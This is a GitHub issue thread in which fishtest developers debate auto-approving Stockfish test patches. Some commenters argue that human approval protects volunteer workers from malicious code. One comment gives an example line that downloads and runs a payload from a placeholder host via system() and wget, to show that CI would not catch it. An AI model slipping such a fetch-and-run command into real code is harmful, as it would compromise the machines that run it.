fishtest icon indicating copy to clipboard operation
fishtest copied to clipboard

Proposal for an auto-approve feature

Open Stefano80 opened this issue 6 years ago • 13 comments

I noticed that since we introduced the last changes https://github.com/glinscott/fishtest/pull/239 concerning autofill of the benches, all devs started actually writing the bench of the branch in the commit message since they saw an advantage with it.

In short, by giving a reward to use good patterns, they immediately use the better pattern.

I was thinking, maybe we can allow auto-approve, using the following design. Are eligible to autoapproval those patches which satisfy following criteria:

  • there are only changes in .h or .cpp files
  • the branch passes a Travis CI build on the committer repository
  • it has [0,5] bounds or [0,4] with only changes in numerics

Every 15 min we then automatically scan the pending tests and check whether there is a corresponding passing Travis CI build using their API and approve those eligible.

This would give a reward for connecting the repository to Travis, give a reward to submit non [-3,1] patches, and get some workload off the approvers.

Any thoughts?

Stefano80 avatar Apr 24 '18 17:04 Stefano80

I thought the purpose of the approval process was to prevent any malicious code from being executed on the worker machines. It would be irresponsible of us to expose our contributors to this security hole.

mstembera avatar Apr 24 '18 21:04 mstembera

it has [0,5] bounds or [0,4] with only changes in numerics

In practice only [0,4] tests will only have changes to numeric constants. For those changes I do not see the reason/advantage of Travis builds. Auto-approving these tests makes sense to me, because introducing real malicious code with those changes is not possible. DOS attacks, eg allocating enormous amounts of memory, etc., are possible, but I would trust such an automated test more then the current human source code inspection. @vondele What are your thoughts?

tomtor avatar Apr 25 '18 11:04 tomtor

As an example of a [0,4] test that would fail a travis build see the recent: http://tests.stockfishchess.org/tests/view/5adf2bfc0ebc590331056b48 (look at commit comments).

In addition to the security aspect, I like the policy of having all patches 'approved'. At least one other human has seen the idea, can comment on it, can correct, etc. There have been countless times where I was inspired by or learned something from a patch I approved.

I also don't see the need to differentiate [-3,1] from [0,N] patches... both classes are needed to keep the code in good shape.

That the framework is sometimes going idle with some patches pending is, a pity but not terrible.

vondele avatar Apr 25 '18 13:04 vondele

Ok, I try to summarize:

  1. from the security point of view, there is no risk in auto-approving parameter tunes
  2. there are some corner cases in which even parameter tunes could fail on CI
  3. from the security point of view, there could be some risk in auto-approving functional patches, but automatic test should be more efficient in catching malicious code
  4. from the community point of view, it looks sensible to encourage people in reviewing functional patches

Taking everything together, it looks to me that we only have advantages if we implement is auto-approval for patches with [0,4] bounds, after checking that the diff to master only contains numerics. For the rest there is still a need for discussion.

Do you agree?

Stefano80 avatar Apr 25 '18 18:04 Stefano80

Proper parameter tunes only have changes to numeric constants. Anyone wanting to execute malicious code will obviously not abide by this.

mstembera avatar Apr 25 '18 18:04 mstembera

Therefore I propose to autoapprove after checking the diff

Stefano80 avatar Apr 25 '18 18:04 Stefano80

Concerning automatic tests catching security issues .... no way. You can add system("wget https://dark.net/payload && payload") to the code, and it would still pass travis.

vondele avatar Apr 25 '18 18:04 vondele

I see. I just found out that

git diff master --word-diff-regex='[a-z]' | grep \]\{

or something similar should make possible to identify the changelists containing only parameter tunes. Just as thought...

Stefano80 avatar May 02 '18 18:05 Stefano80

Auto-approve can be done on passing stc tests, since they are already approved once by human it is redundant to do it again. Maybe make it an option turned on by default on stc tests, "auto submit ltc in case stc pass" so tester can also opt out for other reasons. Maybe same for spsa tests, auto submit with updated variables to stc tests after it finishes then ltc after that etc..

candirufish avatar May 03 '18 15:05 candirufish

I don't see auto-approve on STC tests. Even parameter tunes need a second look. Some people can simply troll with useless tests.

However a checkbox auto approve LTC is interesting (checked by default). When framework is empty, we often see aprovers start LTC tests on behalf of other people, but most people prefers to see the tests under their name, it makes their test follow-up or history searching easier. (easier also for other people to follow the test history)

Rocky640 avatar May 05 '18 20:05 Rocky640

Another case to consider is that anyone (approver or not) can reschedule someone else test. STC auto-approval would have to catch this (or would have to remove permit to reschedule by non-approvers)

Another common instance is user submit test A with some code changes and params. Test B or C will be exactly the same, except for some small param changes. This could be a good candidate to auto-approval for test B or C

Rocky640 avatar May 05 '18 20:05 Rocky640

I would agree with an optional (default on) auto-LTC-reschedule-without-approval for passed STC tests...

vondele avatar May 06 '18 12:05 vondele

@vondele It would be nice if someone implements an auto-LTC for passed STC tests.

SFisGOD avatar Oct 09 '20 17:10 SFisGOD